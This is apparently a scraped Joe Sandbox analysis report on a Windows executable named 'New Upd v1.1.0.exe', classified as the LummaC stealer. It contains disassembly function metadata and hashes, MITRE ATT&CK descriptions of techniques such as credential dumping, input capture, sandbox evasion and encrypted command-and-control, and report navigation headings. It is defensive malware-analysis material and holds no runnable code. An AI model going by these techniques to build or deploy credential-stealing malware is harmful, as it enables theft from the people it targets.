Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: Window$EnvironmentShowUpdateVariable_memset
String ID: ARMSPLASHOFF
API String ID: 2789383349-2711264934
Opcode ID: 852c8fda12c7d0ae7b35b95cf8387734143f94272fd5f4cec3cd77582f6f8fef
Instruction ID: a2c6d364536c8180e2c0db13806f2378c315acd654ed19840a2ffff559dd83c6
Opcode Fuzzy Hash: 852c8fda12c7d0ae7b35b95cf8387734143f94272fd5f4cec3cd77582f6f8fef
Instruction Fuzzy Hash: 1D716AB490429CDBCF28CF18C8917FD7BB1AF89344F548099EA5A9B341D7789A90CF91

Function 007EF2E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 007EF316

Part of subcall function 007ED630: _memcpy_s.LIBCMT ref: 007ED678

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 007EF414

Part of subcall function 007EDD70: _strlen.LIBCMT ref: 007EDD8F

Part of subcall function 0080D2D2: RaiseException.KERNEL32(?,?,0080AAEA,?,?,?,?,?,0080AAEA,?,0084375C,00847B60), ref: 0080D312

Strings

bad locale name, xrefs: 007EF3CE

Memory Dump Source

Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd

Similarity

API ID: std::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_Raise_memcpy_s_strlen
String ID: bad locale name
API String ID: 1176334253-1405518554
Opcode ID: 80953662d2d8bb17aefaf19f12b9eeffbad3744a0656f8d511ba24257812c4ca
Instruction ID: 8d657ce267107e7a44bcc7653222e4eeb43254b2466b0d3d6d3d23c9580ed2f3
Opcode Fuzzy Hash: 80953662d2d8bb17aefaf19f12b9eeffbad3744a0656f8d511ba24257812c4ca
Instruction Fuzzy Hash: 3C412570A40298EBEB24DFA4CC56BEDBB70AB44704F1081A9E1096B2C1D7B42E48CF91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report New Upd v1.1.0.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
New Upd v1.1.0.exe

Function 00815020 Relevance: 3.6, APIs: 2, Instructions: 648
fileCOMMONLIBRARYCODE

Function 00815213 Relevance: 3.5, APIs: 2, Instructions: 488
fileCOMMON

Function 008154A5 Relevance: 3.3, APIs: 2, Instructions: 276
fileCOMMON

Function 00814D3A Relevance: 2.1, APIs: 1, Instructions: 608
COMMON

Function 007F9170 Relevance: 25.7, APIs: 17, Instructions: 168
windowkeyboardCOMMON

Function 007FF400 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 42
libraryloaderCOMMON

Function 0080735C Relevance: 10.7, Strings: 8, Instructions: 709
COMMON

Function 007EC070 Relevance: 42.2, APIs: 28, Instructions: 232
windowmemorysleepCOMMON

Function 007F32B0 Relevance: 31.8, APIs: 5, Strings: 13, Instructions: 324
windowCOMMON

Function 007FA390 Relevance: 21.2, APIs: 14, Instructions: 206
sleepthreadCOMMON

Function 007EC400 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 69
windowthreadCOMMON

Function 00814022 Relevance: 10.7, APIs: 7, Instructions: 157
COMMONLIBRARYCODE

Function 007F93C0 Relevance: 10.6, APIs: 7, Instructions: 64
timewindowCOMMON

Function 007FF4E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26
libraryloaderCOMMON